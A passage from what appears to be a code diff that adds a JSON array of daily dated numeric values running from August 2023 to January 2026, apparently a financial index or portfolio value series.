+ 10784.499452433112 + ], + [ + "2023-08-23", + 10954.555860521361 + ], + [ + "2023-08-24", + 10720.392197257 + ], + [ + "2023-08-25", + 10803.492387775483 + ], + [ + "2023-08-28", + 10884.811386519259 + ], + [ + "2023-08-29", + 11122.535592307939 + ], + [ + "2023-08-30", + 11184.561568619654 + ], + [ + "2023-08-31", + 11218.100443199175 + ], + [ + "2023-09-01", + 11206.228592905443 + ], + [ + "2023-09-05", + 11220.474445052903 + ], + [ + "2023-09-06", + 11121.64361565177 + ], + [ + "2023-09-07", + 11042.106729195242 + ], + [ + "2023-09-08", + 11057.538201500749 + ], + [ + "2023-09-11", + 11187.827547129551 + ], + [ + "2023-09-12", + 11063.772832968489 + ], + [ + "2023-09-13", + 11105.915738306752 + ], + [ + "2023-09-14", + 11196.731664977986 + ], + [ + "2023-09-15", + 11005.009153116493 + ], + [ + "2023-09-18", + 11016.481500965663 + ], + [ + "2023-09-19", + 10993.001066966091 + ], + [ + "2023-09-20", + 10834.588222060396 + ], + [ + "2023-09-21", + 10636.048394290134 + ], + [ + "2023-09-22", + 10637.536863075507 + ], + [ + "2023-09-25", + 10688.060114624062 + ], + [ + "2023-09-26", + 10527.56414982888 + ], + [ + "2023-09-27", + 10552.23572706177 + ], + [ + "2023-09-28", + 10640.507357058439 + ], + [ + "2023-09-29", + 10648.234139361733 + ], + [ + "2023-10-02", + 10737.100420462515 + ], + [ + "2023-10-03", + 10548.668740949635 + ], + [ + "2023-10-04", + 10692.222672352857 + ], + [ + "2023-10-05", + 10660.718130497933 + ], + [ + "2023-10-06", + 10839.341748843122 + ], + [ + "2023-10-09", + 10894.624050249675 + ], + [ + "2023-10-10", + 10954.958124503557 + ], + [ + "2023-10-11", + 11033.124367780478 + ], + [ + "2023-10-12", + 10994.78502027843 + ], + [ + "2023-10-13", + 10856.580187274596 + ], + [ + "2023-10-16", + 10979.329614646755 + ], + [ + "2023-10-17", + 10943.367951048616 + ], + [ + "2023-10-18", + 10799.81494015794 + ], + [ + "2023-10-19", + 10698.76107296047 + ], + [ + "2023-10-20", + 10539.158925846546 + ], + [ + "2023-10-23", + 10570.958952228437 + ], + [ + "2023-10-24", + 10673.794931713157 + ], + [ + "2023-10-25", + 10412.544266297651 + ], + [ + "2023-10-26", + 10214.00996160266 + ], + [ + "2023-10-27", + 10263.047505903478 + ], + [ + "2023-10-30", + 10378.66388156391 + ], + [ + "2023-10-31", + 10428.296997481386 + ], + [ + "2023-11-01", + 10609.300140755573 + ], + [ + "2023-11-02", + 10801.895298509791 + ], + [ + "2023-11-03", + 10928.80452207311 + ], + [ + "2023-11-06", + 10973.38494463071 + ], + [ + "2023-11-07", + 11077.114741796691 + ], + [ + "2023-11-08", + 11084.245952483327 + ], + [ + "2023-11-09", + 10998.947578007224 + ], + [ + "2023-11-10", + 11246.225783501157 + ], + [ + "2023-11-13", + 11211.157017071733 + ], + [ + "2023-11-14", + 11452.492393574712 + ], + [ + "2023-11-15", + 11461.11023202163 + ], + [ + "2023-11-16", + 11470.921975239502 + ], + [ + "2023-11-17", + 11473.593302645286 + ], + [ + "2023-11-20", + 11613.282922384315 + ], + [ + "2023-11-21", + 11545.816716931255 + ], + [ + "2023-11-22", + 11593.073069457367 + ], + [ + "2023-11-24", + 11576.72752819461 + ], + [ + "2023-11-27", + 11566.623061987408 + ], + [ + "2023-11-28", + 11596.938301634103 + ], + [ + "2023-11-29", + 11585.64361270613 + ], + [ + "2023-11-30", + 11556.516754755115 + ], + [ + "2023-12-01", + 11589.50792437032 + ], + [ + "2023-12-04", + 11481.916577077784 + ], + [ + "2023-12-05", + 11510.74610947674 + ], + [ + "2023-12-06", + 11444.170960167305 + ], + [ + "2023-12-07", + 11604.070432833283 + ], + [ + "2023-12-08", + 11655.786668640245 + ], + [ + "2023-12-11", + 11755.352987564887 + ], + [ + "2023-12-12", + 11848.973715960941 + ], + [ + "2023-12-13", + 11999.658858050798 + ], + [ + "2023-12-14", + 11989.25890731663 + ], + [ + "2023-12-15", + 12047.213456641512 + ], + [ + "2023-12-18", + 12123.094987781576 + ], + [ + "2023-12-19", + 12185.03903847678 + ], + [ + "2023-12-20", + 12003.973300349528 + ], + [ + "2023-12-21", + 12143.644509837655 + ], + [ + "2023-12-22", + 12161.810824914555 + ], + [ + "2023-12-26", + 12236.261879559586 + ], + [ + "2023-12-27", + 12261.171869541648 + ], + [ + "2023-12-28", + 12255.211550812339 + ], + [ + "2023-12-29", + 12202.17714104084 + ], + [ + "2024-01-02", + 11995.686846418834 + ], + [ + "2024-01-03", + 11868.755530554436 + ], + [ + "2024-01-04", + 11807.673079601414 + ], + [ + "2024-01-05", + 11821.67683694952 + ], + [ + "2024-01-08", + 12066.005720249057 + ], + [ + "2024-01-09", + 12089.843313116116 + ], + [ + "2024-01-10", + 12171.783657827813 + ], + [ + "2024-01-11", + 12197.111560505336 + ], + [ + "2024-01-12", + 12203.368284274156 + ], + [ + "2024-01-16", + 12202.17714104084 + ], + [ + "2024-01-17", + 12133.3448949709 + ], + [ + "2024-01-18", + 12305.570030615327 + ], + [ + "2024-01-19", + 12549.599747337717 + ], + [ + "2024-01-22", + 12565.989473202637 + ], + [ + "2024-01-23", + 12618.131906317965 + ], + [ + "2024-01-24", + 12688.152534083589 + ], + [ + "2024-01-25", + 12703.647521754703 + ], + [ + "2024-01-26", + 12627.965741836917 + ], + [ + "2024-01-29", + 12757.280264680496 + ], + [ + "2024-01-30", + 12672.360220860415 + ], + [ + "2024-01-31", + 12424.157820771237 + ], + [ + "2024-02-01", + 12570.457641096393 + ], + [ + "2024-02-02", + 12782.905492910075 + ], + [ + "2024-02-05", + 12766.221203030733 + ], + [ + "2024-02-06", + 12740.594133776063 + ], + [ + "2024-02-07", + 12871.699053519797 + ], + [ + "2024-02-08", + 12895.53572587431 + ], + [ + "2024-02-09", + 13022.467962251254 + ], + [ + "2024-02-12", + 12971.515751856698 + ], + [ + "2024-02-13", + 12769.19814060148 + ], + [ + "2024-02-14", + 12908.3483399891 + ], + [ + "2024-02-15", + 12946.786182333468 + ], + [ + "2024-02-16", + 12829.389535410875 + ], + [ + "2024-02-20", + 12732.549774644722 + ], + [ + "2024-02-21", + 12681.597564250165 + ], + [ + "2024-02-22", + 13052.861445464281 + ], + [ + "2024-02-23", + 13014.422682607366 + ], + [ + "2024-02-26", + 13007.56762568425 + ], + [ + "2024-02-27", + 13038.854926578539 + ], + [ + "2024-02-28", + 12969.42894991703 + ], + [ + "2024-02-29", + 13080.5688730708 + ], + [ + "2024-03-01", + 13277.522657725913 + ], + [ + "2024-03-04", + 13230.145718056398 + ], + [ + "2024-03-05", + 12992.670050654884 + ], + [ + "2024-03-06", + 13074.313069814525 + ], + [ + "2024-03-07", + 13272.756243767555 + ], + [ + "2024-03-08", + 13081.167206225095 + ], + [ + "2024-03-11", + 13032.598202809717 + ], + [ + "2024-03-12", + 13219.421746906364 + ], + [ + "2024-03-13", + 13117.816492694397 + ], + [ + "2024-03-14", + 13084.742476950136 + ], + [ + "2024-03-15", + 12929.204392722686 + ], + [ + "2024-03-18", + 13052.51625325988 + ], + [ + "2024-03-19", + 13085.037040964557 + ], + [ + "2024-03-20", + 13240.181145822718 + ], + [ + "2024-03-21", + 13302.837673227805 + ], + [ + "2024-03-22", + 13318.054666110309 + ], + [ + "2024-03-25", + 13269.721313906468 + ], + [ + "2024-03-26", + 13226.75639086546 + ], + [ + "2024-03-27", + 13271.808115846135 + ], + [ + "2024-03-28", + 13247.343653935886 + ], + [ + "2024-04-01", + 13275.389830158992 + ], + [ + "2024-04-02", + 13160.81823623721 + ], + [ + "2024-04-03", + 13190.356563295869 + ], + [ + "2024-04-04", + 12988.667662108934 + ], + [ + "2024-04-05", + 13141.724965027428 + ], + [ + "2024-04-08", + 13145.60400489234 + ], + [ + "2024-04-09", + 13194.236523673328 + ], + [ + "2024-04-10", + 13079.069358134888 + ], + [ + "2024-04-11", + 13287.920767434991 + ], + [ + "2024-04-12", + 13076.086897488869 + ], + [ + "2024-04-15", + 12860.971400319584 + ], + [ + "2024-04-16", + 12862.163464065445 + ], + [ + "2024-04-17", + 12705.228041794584 + ], + [ + "2024-04-18", + 12632.728473745095 + ], + [ + "2024-04-19", + 12371.367346824181 + ], + [ + "2024-04-22", + 12495.781981390366 + ], + [ + "2024-04-23", + 12682.256651232432 + ], + [ + "2024-04-24", + 12725.217892223262 + ], + [ + "2024-04-25", + 12663.757110614219 + ], + [ + "2024-04-26", + 12859.181923931974 + ], + [ + "2024-04-29", + 12911.392474975637 + ], + [ + "2024-04-30", + 12667.934396543733 + ], + [ + "2024-05-01", + 12576.339716259372 + ], + [ + "2024-05-02", + 12736.855011818001 + ], + [ + "2024-05-03", + 12992.846789063538 + ], + [ + "2024-05-06", + 13135.161710581098 + ], + [ + "2024-05-07", + 13137.250353545856 + ], + [ + "2024-05-08", + 13129.493194328576 + ], + [ + "2024-05-09", + 13158.134021655795 + ], + [ + "2024-05-10", + 13189.164499550008 + ], + [ + "2024-05-13", + 13219.594803264838 + ], + [ + "2024-05-14", + 13304.626229102869 + ], + [ + "2024-05-15", + 13512.582900209169 + ], + [ + "2024-05-16", + 13485.13413662781 + ], + [ + "2024-05-17", + 13478.569961668936 + ], + [ + "2024-05-20", + 13572.551530982657 + ], + [ + "2024-05-21", + 13599.105556370208 + ], + [ + "2024-05-22", + 13596.420421276249 + ], + [ + "2024-05-23", + 13535.257885731808 + ], + [ + "2024-05-24", + 13663.253314098303 + ], + [ + "2024-05-28", + 13714.868293525307 + ], + [ + "2024-05-29", + 13618.200668605083 + ], + [ + "2024-05-30", + 13472.30495328721 + ], + [ + "2024-05-31", + 13447.242158222667 + ], + [ + "2024-06-03", + 13519.444400720098 + ], + [ + "2024-06-04", + 13556.440720418892 + ], + [ + "2024-06-05", + 13829.736292486601 + ], + [ + "2024-06-06", + 13824.963434940428 + ], + [ + "2024-06-07", + 13812.729823216487 + ], + [ + "2024-06-10", + 13868.523009085551 + ], + [ + "2024-06-11", + 13963.699403682767 + ], + [ + "2024-06-12", + 14146.59051818689 + ], + [ + "2024-06-13", + 14223.268292678436 + ], + [ + "2024-06-14", + 14296.961765498876 + ], + [ + "2024-06-17", + 14472.098482323352 + ], + [ + "2024-06-18", + 14476.574014317468 + ], + [ + "2024-06-20", + 14364.98948360443 + ], + [ + "2024-06-21", + 14326.49917204499 + ], + [ + "2024-06-24", + 14163.39815674727 + ], + [ + "2024-06-25", + 14325.364180076924 + ], + [ + "2024-06-26", + 14354.949453275382 + ], + [ + "2024-06-27", + 14392.00468577706 + ], + [ + "2024-06-28", + 14317.294967106865 + ], + [ + "2024-07-01", + 14401.26780351807 + ], + [ + "2024-07-02", + 14552.477637758615 + ], + [ + "2024-07-03", + 14673.80211171101 + ], + [ + "2024-07-05", + 14826.803263364254 + ], + [ + "2024-07-08", + 14862.065337428141 + ], + [ + "2024-07-09", + 14874.914772044734 + ], + [ + "2024-07-10", + 15030.008248712917 + ], + [ + "2024-07-11", + 14700.396639650544 + ], + [ + "2024-07-12", + 14786.760047141288 + ], + [ + "2024-07-15", + 14826.504096787108 + ], + [ + "2024-07-16", + 14832.182738677626 + ], + [ + "2024-07-17", + 14396.784907423593 + ], + [ + "2024-07-18", + 14328.652250887902 + ], + [ + "2024-07-19", + 14201.648214532444 + ], + [ + "2024-07-22", + 14413.221579428313 + ], + [ + "2024-07-23", + 14362.419412578602 + ], + [ + "2024-07-24", + 13847.234315455784 + ], + [ + "2024-07-25", + 13694.530489354594 + ], + [ + "2024-07-26", + 13834.98229348094 + ], + [ + "2024-07-29", + 13862.77532875415 + ], + [ + "2024-07-30", + 13672.417936996992 + ], + [ + "2024-07-31", + 14077.03566976907 + ], + [ + "2024-08-01", + 13736.06861795075 + ], + [ + "2024-08-02", + 13410.044246276504 + ], + [ + "2024-08-05", + 13010.209496688594 + ], + [ + "2024-08-06", + 13134.523795387367 + ], + [ + "2024-08-07", + 12992.278832823231 + ], + [ + "2024-08-08", + 13389.724852356692 + ], + [ + "2024-08-09", + 13459.651587842718 + ], + [ + "2024-08-12", + 13488.638527886882 + ], + [ + "2024-08-13", + 13823.32860466039 + ], + [ + "2024-08-14", + 13827.810580242322 + ], + [ + "2024-08-15", + 14177.145091095303 + ], + [ + "2024-08-16", + 14195.373080512722 + ], + [ + "2024-08-19", + 14381.843147792064 + ], + [ + "2024-08-20", + 14351.661382464401 + ], + [ + "2024-08-21", + 14418.599213716594 + ], + [ + "2024-08-22", + 14189.99544622444 + ], + [ + "2024-08-23", + 14343.892256584035 + ], + [ + "2024-08-26", + 14204.636198253733 + ], + [ + "2024-08-27", + 14247.070906068782 + ], + [ + "2024-08-28", + 14085.402208291185 + ], + [ + "2024-08-29", + 14064.783647794226 + ], + [ + "2024-08-30", + 14232.427392501855 + ], + [ + "2024-09-03", + 13800.318552571345 + ], + [ + "2024-09-04", + 13764.458145353165 + ], + [ + "2024-09-05", + 13777.307579969758 + ], + [ + "2024-09-06", + 13408.252008351257 + ], + [ + "2024-09-09", + 13580.676895217965 + ], + [ + "2024-09-10", + 13706.186019200235 + ], + [ + "2024-09-11", + 14003.82178398461 + ], + [ + "2024-09-12", + 14141.284683877122 + ], + [ + "2024-09-13", + 14204.636198253733 + ], + [ + "2024-09-16", + 14141.881176006325 + ], + [ + "2024-09-17", + 14149.352976334634 + ], + [ + "2024-09-18", + 14088.093786972962 + ], + [ + "2024-09-19", + 14444.299003462324 + ], + [ + "2024-09-20", + 14416.806055278803 + ], + [ + "2024-09-23", + 14455.02021307472 + ], + [ + "2024-09-24", + 14524.747197338467 + ], + [ + "2024-09-25", + 14538.2142958728 + ], + [ + "2024-09-26", + 14647.440473445376 + ], + [ + "2024-09-27", + 14566.043231135269 + ], + [ + "2024-09-30", + 14605.54426546919 + ], + [ + "2024-10-01", + 14402.053000719012 + ], + [ + "2024-10-02", + 14422.401851040268 + ], + [ + "2024-10-03", + 14411.630013237891 + ], + [ + "2024-10-04", + 14583.10124910791 + ], + [ + "2024-10-07", + 14426.89303174765 + ], + [ + "2024-10-08", + 14642.35280060879 + ], + [ + "2024-10-09", + 14757.564150749395 + ], + [ + "2024-10-10", + 14740.806219866447 + ], + [ + "2024-10-11", + 14763.847569382022 + ], + [ + "2024-10-14", + 14887.737511797519 + ], + [ + "2024-10-15", + 14688.737427754724 + ], + [ + "2024-10-16", + 14690.532427217604 + ], + [ + "2024-10-17", + 14700.705931865687 + ], + [ + "2024-10-18", + 14797.065185083315 + ], + [ + "2024-10-21", + 14825.493374012623 + ], + [ + "2024-10-22", + 14841.652971741278 + ], + [ + "2024-10-23", + 14614.221937231538 + ], + [ + "2024-10-24", + 14732.725960745847 + ], + [ + "2024-10-25", + 14822.501708241156 + ], + [ + "2024-10-28", + 14824.89504085833 + ], + [ + "2024-10-29", + 14967.339754644745 + ], + [ + "2024-10-30", + 14854.222570544169 + ], + [ + "2024-10-31", + 14479.260990436518 + ], + [ + "2024-11-01", + 14586.392081456523 + ], + [ + "2024-11-04", + 14543.899381351133 + ], + [ + "2024-11-05", + 14729.435128397232 + ], + [ + "2024-11-06", + 15129.533144573032 + ], + [ + "2024-11-07", + 15367.736016885146 + ], + [ + "2024-11-08", + 15385.692455101771 + ], + [ + "2024-11-11", + 15376.71469624973 + ], + [ + "2024-11-12", + 15348.88207893708 + ], + [ + "2024-11-13", + 15329.13340279521 + ], + [ + "2024-11-14", + 15222.6006449295 + ], + [ + "2024-11-15", + 14859.908576535048 + ], + [ + "2024-11-18", + 14963.148661027055 + ], + [ + "2024-11-19", + 15066.092340479549 + ], + [ + "2024-11-20", + 15057.413748204655 + ], + [ + "2024-11-21", + 15111.578547381496 + ], + [ + "2024-11-22", + 15135.817483718205 + ], + [ + "2024-11-25", + 15159.75633296522 + ], + [ + "2024-11-26", + 15241.152654762782 + ], + [ + "2024-11-27", + 15121.151877850194 + ], + [ + "2024-11-29", + 15254.020499630276 + ], + [ + "2024-12-02", + 15420.103975574015 + ], + [ + "2024-12-03", + 15467.387022963934 + ], + [ + "2024-12-04", + 15658.608776000912 + ], + [ + "2024-12-05", + 15615.217655651537 + ], + [ + "2024-12-06", + 15754.966188193452 + ], + [ + "2024-12-09", + 15632.274753111631 + ], + [ + "2024-12-10", + 15579.010215203867 + ], + [ + "2024-12-11", + 15857.9089471334 + ], + [ + "2024-12-12", + 15755.566362372834 + ], + [ + "2024-12-13", + 15876.164551927171 + ], + [ + "2024-12-16", + 16104.790411720407 + ], + [ + "2024-12-17", + 16033.870443198255 + ], + [ + "2024-12-18", + 15455.41483680279 + ], + [ + "2024-12-19", + 15386.58811380812 + ], + [ + "2024-12-20", + 15520.95348898648 + ], + [ + "2024-12-23", + 15672.16976681484 + ], + [ + "2024-12-24", + 15884.679292969042 + ], + [ + "2024-12-26", + 15873.889044915766 + ], + [ + "2024-12-27", + 15662.878113184934 + ], + [ + "2024-12-30", + 15454.560601160969 + ], + [ + "2024-12-31", + 15323.280784033674 + ], + [ + "2025-01-02", + 15293.306134028651 + ], + [ + "2025-01-03", + 15543.583369394411 + ], + [ + "2025-01-06", + 15722.221715940323 + ], + [ + "2025-01-07", + 15441.672505017485 + ], + [ + "2025-01-08", + 15444.374209337257 + ], + [ + "2025-01-10", + 15202.186438217544 + ], + [ + "2025-01-13", + 15153.331155400652 + ], + [ + "2025-01-14", + 15138.943544321251 + ], + [ + "2025-01-15", + 15487.235114460673 + ], + [ + "2025-01-16", + 15378.731539235972 + ], + [ + "2025-01-17", + 15638.298587206551 + ], + [ + "2025-01-21", + 15730.01845719704 + ], + [ + "2025-01-22", + 15931.139402143672 + ], + [ + "2025-01-23", + 15965.008740726871 + ], + [ + "2025-01-24", + 15874.78930618484 + ], + [ + "2025-01-27", + 15412.600877819174 + ], + [ + "2025-01-28", + 15640.397355809304 + ], + [ + "2025-01-29", + 15611.021959471122 + ], + [ + "2025-01-30", + 15677.563970328934 + ], + [ + "2025-01-31", + 15654.784966888703 + ], + [ + "2025-02-03", + 15529.495845404705 + ], + [ + "2025-02-04", + 15720.126629387749 + ], + [ + "2025-02-05", + 15791.462669580273 + ], + [ + "2025-02-06", + 15873.889044915766 + ], + [ + "2025-02-07", + 15673.668361238211 + ], + [ + "2025-02-10", + 15863.39888395218 + ], + [ + "2025-02-11", + 15825.632095253166 + ], + [ + "2025-02-12", + 15834.923748883073 + ], + [ + "2025-02-13", + 16062.722988410838 + ], + [ + "2025-02-14", + 16130.161578487548 + ], + [ + "2025-02-18", + 16166.728018827795 + ], + [ + "2025-02-19", + 16171.225643122993 + ], + [ + "2025-02-20", + 16102.586704687517 + ], + [ + "2025-02-21", + 15768.383579050349 + ], + [ + "2025-02-24", + 15582.250419362503 + ], + [ + "2025-02-25", + 15385.924424263127 + ], + [ + "2025-02-26", + 15423.089197757668 + ], + [ + "2025-02-27", + 14994.771028487747 + ], + [ + "2025-02-28", + 15231.561834555729 + ], + [ + "2025-03-03", + 14898.257129162546 + ], + [ + "2025-03-04", + 14853.296534923831 + ], + [ + "2025-03-05", + 15046.924507753616 + ], + [ + "2025-03-06", + 14632.992108538003 + ], + [ + "2025-03-07", + 14740.597263518715 + ], + [ + "2025-03-10", + 14169.306926774056 + ], + [ + "2025-03-11", + 14135.43482665322 + ], + [ + "2025-03-12", + 14294.894294322656 + ], + [ + "2025-03-13", + 14037.722419994343 + ], + [ + "2025-03-14", + 14377.020582568457 + ], + [ + "2025-03-17", + 14470.23628544468 + ], + [ + "2025-03-18", + 14223.557333617588 + ], + [ + "2025-03-19", + 14413.887109998395 + ], + [ + "2025-03-20", + 14365.030906668957 + ], + [ + "2025-03-21", + 14412.388515575027 + ], + [ + "2025-03-24", + 14728.659136321741 + ], + [ + "2025-03-25", + 14812.708375274186 + ], + [ + "2025-03-26", + 14540.14553119235 + ], + [ + "2025-03-27", + 14457.296640598672 + ], + [ + "2025-03-28", + 14076.666544238498 + ], + [ + "2025-03-31", + 14076.066370059114 + ], + [ + "2025-04-01", + 14189.53611046445 + ], + [ + "2025-04-02", + 14293.09653332214 + ], + [ + "2025-04-03", + 13527.937049460888 + ], + [ + "2025-04-04", + 12687.731859850492 + ], + [ + "2025-04-07", + 12718.349948124516 + ], + [ + "2025-04-08", + 12489.31169871109 + ], + [ + "2025-04-09", + 13988.41332449273 + ], + [ + "2025-04-10", + 13393.455689701848 + ], + [ + "2025-04-11", + 13640.203679969822 + ], + [ + "2025-04-14", + 13732.66088050891 + ], + [ + "2025-04-15", + 13747.969004133378 + ], + [ + "2025-04-16", + 13333.41986151257 + ], + [ + "2025-04-17", + 13331.01824428249 + ], + [ + "2025-04-21", + 13001.11851479351 + ], + [ + "2025-04-22", + 13342.424315228416 + ], + [ + "2025-04-23", + 13645.006914429981 + ], + [ + "2025-04-24", + 14028.938889289311 + ], + [ + "2025-04-25", + 14185.33212967113 + ], + [ + "2025-04-28", + 14180.829902813206 + ], + [ + "2025-04-29", + 14274.486531198518 + ], + [ + "2025-04-30", + 14272.684167635276 + ], + [ + "2025-05-01", + 14459.095322111732 + ], + [ + "2025-05-02", + 14673.725709169768 + ], + [ + "2025-05-05", + 14586.67283778277 + ], + [ + "2025-05-06", + 14450.992050177507 + ], + [ + "2025-05-07", + 14507.725079355085 + ], + [ + "2025-05-08", + 14657.515483251136 + ], + [ + "2025-05-09", + 14647.910855355905 + ], + [ + "2025-05-12", + 15244.669933197483 + ], + [ + "2025-05-13", + 15477.010061110066 + ], + [ + "2025-05-14", + 15569.764587201213 + ], + [ + "2025-05-15", + 15586.873233363829 + ], + [ + "2025-05-16", + 15654.716848960368 + ], + [ + "2025-05-19", + 15669.724885495143 + ], + [ + "2025-05-20", + 15617.493162662944 + ], + [ + "2025-05-21", + 15400.462999399919 + ], + [ + "2025-05-22", + 15429.281485648335 + ], + [ + "2025-05-23", + 15286.394005327742 + ], + [ + "2025-05-27", + 15646.008800284033 + ], + [ + "2025-05-28", + 15576.668431289216 + ], + [ + "2025-05-29", + 15607.286519563238 + ], + [ + "2025-05-30", + 15582.672014108144 + ], + [ + "2025-06-02", + 15705.7482234338 + ], + [ + "2025-06-03", + 15828.520663619585 + ], + [ + "2025-06-04", + 15872.648194005014 + ], + [ + "2025-06-05", + 15753.17302975566 + ], + [ + "2025-06-06", + 15907.167414445034 + ], + [ + "2025-06-09", + 15930.57973051627 + ], + [ + "2025-06-10", + 16035.947119499926 + ], + [ + "2025-06-11", + 15981.911192079395 + ], + [ + "2025-06-12", + 16019.43312444142 + ], + [ + "2025-06-13", + 15818.314020519882 + ], + [ + "2025-06-16", + 16038.345975192371 + ], + [ + "2025-06-17", + 15881.952734810553 + ], + [ + "2025-06-18", + 15879.250109978237 + ], + [ + "2025-06-20", + 15814.412888353887 + ], + [ + "2025-06-23", + 15977.023270465088 + ], + [ + "2025-06-24", + 16221.343869151719 + ], + [ + "2025-06-25", + 16262.812959306993 + ], + [ + "2025-06-26", + 16414.874267651725 + ], + [ + "2025-06-27", + 16471.073399553166 + ], + [ + "2025-06-30", + 16577.757121476265 + ], + [ + "2025-07-01", + 16438.015953034712 + ], + [ + "2025-07-02", + 16552.512985440346 + ], + [ + "2025-07-03", + 16715.393998239797 + ], + [ + "2025-07-07", + 16589.477087200063 + ], + [ + "2025-07-08", + 16598.79451518123 + ], + [ + "2025-07-09", + 16716.29425950887 + ], + [ + "2025-07-10", + 16692.2541538819 + ], + [ + "2025-07-11", + 16654.689877942797 + ], + [ + "2025-07-14", + 16715.093911150103 + ], + [ + "2025-07-15", + 16730.41860400038 + ], + [ + "2025-07-16", + 16747.551183489173 + ], + [ + "2025-07-17", + 16883.08192754959 + ], + [ + "2025-07-18", + 16866.855132405144 + ], + [ + "2025-07-21", + 16954.305665211614 + ], + [ + "2025-07-22", + 16866.55504531545 + ], + [ + "2025-07-23", + 16943.485960756894 + ], + [ + "2025-07-24", + 16979.547960222444 + ], + [ + "2025-07-25", + 17020.420558248516 + ], + [ + "2025-07-28", + 17073.611455152673 + ], + [ + "2025-07-29", + 17047.166970757986 + ], + [ + "2025-07-30", + 17070.0048870011 + ], + [ + "2025-07-31", + 16979.547960222444 + ], + [ + "2025-08-01", + 16645.072362871935 + ], + [ + "2025-08-04", + 16952.20137353359 + ], + [ + "2025-08-05", + 16837.104166948575 + ], + [ + "2025-08-06", + 17048.971175346316 + ], + [ + "2025-08-07", + 17106.667060646036 + ], + [ + "2025-08-08", + 17266.243433408697 + ], + [ + "2025-08-11", + 17215.15314613238 + ], + [ + "2025-08-12", + 17431.52698395077 + ], + [ + "2025-08-13", + 17440.24423775256 + ], + [ + "2025-08-14", + 17426.71822641534 + ], + [ + "2025-08-15", + 17350.08923908868 + ], + [ + "2025-08-18", + 17343.176189875227 + ], + [ + "2025-08-19", + 17107.869250029893 + ], + [ + "2025-08-20", + 17006.294372731914 + ], + [ + "2025-08-21", + 16927.561093727232 + ], + [ + "2025-08-22", + 17188.70866173769 + ], + [ + "2025-08-25", + 17139.126174010195 + ], + [ + "2025-08-26", + 17207.94000982923 + ], + [ + "2025-08-27", + 17234.388176274104 + ], + [ + "2025-08-28", + 17342.274087581063 + ], + [ + "2025-08-29", + 17141.52871175282 + ], + [ + "2025-09-02", + 16997.88088807 + ], + [ + "2025-09-03", + 17131.611109592264 + ], + [ + "2025-09-04", + 17286.676970884095 + ], + [ + "2025-09-05", + 17311.621019830327 + ], + [ + "2025-09-08", + 17396.066999689694 + ], + [ + "2025-09-09", + 17445.35124135259 + ], + [ + "2025-09-10", + 17451.062101182186 + ], + [ + "2025-09-11", + 17552.636978480165 + ], + [ + "2025-09-12", + 17630.16990912608 + ], + [ + "2025-09-15", + 17781.029028086956 + ], + [ + "2025-09-16", + 17766.00258130128 + ], + [ + "2025-09-17", + 17730.54443806529 + ], + [ + "2025-09-18", + 17890.419056892555 + ], + [ + "2025-09-19", + 18011.527210396856 + ], + [ + "2025-09-22", + 18118.153860542167 + ], + [ + "2025-09-23", + 17997.80789142518 + ], + [ + "2025-09-24", + 17934.62575135686 + ], + [ + "2025-09-25", + 17857.30453859631 + ], + [ + "2025-09-26", + 17930.713573040324 + ], + [ + "2025-09-29", + 18013.75300973083 + ], + [ + "2025-09-30", + 18063.09616419661 + ], + [ + "2025-10-01", + 18149.74401006378 + ], + [ + "2025-10-02", + 18224.358915941833 + ], + [ + "2025-10-03", + 18147.639718385755 + ], + [ + "2025-10-06", + 18283.9308058084 + ], + [ + "2025-10-07", + 18187.654398719824 + ], + [ + "2025-10-08", + 18396.154172227714 + ], + [ + "2025-10-09", + 18373.89065581272 + ], + [ + "2025-10-10", + 17736.054626160065 + ], + [ + "2025-10-13", + 18112.437477637297 + ], + [ + "2025-10-14", + 17991.79142143062 + ], + [ + "2025-10-15", + 18118.75587574664 + ], + [ + "2025-10-16", + 18051.663398386874 + ], + [ + "2025-10-17", + 18170.203321890443 + ], + [ + "2025-10-20", + 18399.162407224994 + ], + [ + "2025-10-21", + 18394.34996763938 + ], + [ + "2025-10-22", + 18217.138415538324 + ], + [ + "2025-10-23", + 18370.280405610967 + ], + [ + "2025-10-24", + 18566.443469989863 + ], + [ + "2025-10-27", + 18897.097099253253 + ], + [ + "2025-10-28", + 19042.41473269282 + ], + [ + "2025-10-29", + 19128.162317290917 + ], + [ + "2025-10-30", + 18835.719163773265 + ], + [ + "2025-10-31", + 18926.58295709684 + ], + [ + "2025-11-03", + 19017.14114025546 + ], + [ + "2025-11-04", + 18631.12972755682 + ], + [ + "2025-11-05", + 18752.381481018158 + ], + [ + "2025-11-06", + 18403.074585541526 + ], + [ + "2025-11-07", + 18345.0068131736 + ], + [ + "2025-11-10", + 18750.875522494425 + ], + [ + "2025-11-11", + 18700.932193849265 + ], + [ + "2025-11-12", + 18686.189264927467 + ], + [ + "2025-11-13", + 18304.69204574984 + ], + [ + "2025-11-14", + 18318.53103135238 + ], + [ + "2025-11-17", + 18162.08071919277 + ], + [ + "2025-11-18", + 17940.94230844111 + ], + [ + "2025-11-19", + 18048.051307160033 + ], + [ + "2025-11-20", + 17620.82118371838 + ], + [ + "2025-11-21", + 17753.203774874666 + ], + [ + "2025-11-24", + 18207.209767227232 + ], + [ + "2025-11-25", + 18319.434974671636 + ], + [ + "2025-11-26", + 18481.299741621333 + ], + [ + "2025-11-28", + 18631.12972755682 + ], + [ + "2025-12-01", + 18568.54960269298 + ], + [ + "2025-12-02", + 18713.867236132548 + ], + [ + "2025-12-03", + 18759.600140396575 + ], + [ + "2025-12-04", + 18742.15090459228 + ], + [ + "2025-12-05", + 18818.570015058664 + ], + [ + "2025-12-08", + 18782.465672016042 + ], + [ + "2025-12-09", + 18805.6312907252 + ], + [ + "2025-12-10", + 18882.65425742115 + ], + [ + "2025-12-11", + 18821.580091081036 + ], + [ + "2025-12-12", + 18461.742532088836 + ], + [ + "2025-12-15", + 18369.076375202018 + ], + [ + "2025-12-16", + 18405.480805334333 + ], + [ + "2025-12-17", + 18064.298353580467 + ], + [ + "2025-12-18", + 18326.05161884558 + ], + [ + "2025-12-19", + 18564.941193516315 + ], + [ + "2025-12-22", + 18653.930823298135 + ], + [ + "2025-12-23", + 18741.292986900276 + ], + [ + "2025-12-24", + 18796.12239613466 + ], + [ + "2025-12-26", + 18794.91652470062 + ], + [ + "2025-12-29", + 18703.938587821453 + ], + [ + "2025-12-30", + 18660.55667259753 + ], + [ + "2025-12-31", + 18506.315590546077 + ], + [ + "2026-01-02", + 18470.467149990982 + ], + [ + "2026-01-05", + 18617.176598398695 + ], + [ + "2026-01-06", + 18780.757200732398 + ], + [ + "2026-01-07", + 18798.834226092426 + ], + [ + "2026-01-08", + 18691.887237581435 + ], + [ + "2026-01-09", + 18878.062740846355 + ], + [ + "2026-01-12", + 18893.728023338306 + ], + [ + "2026-01-13", 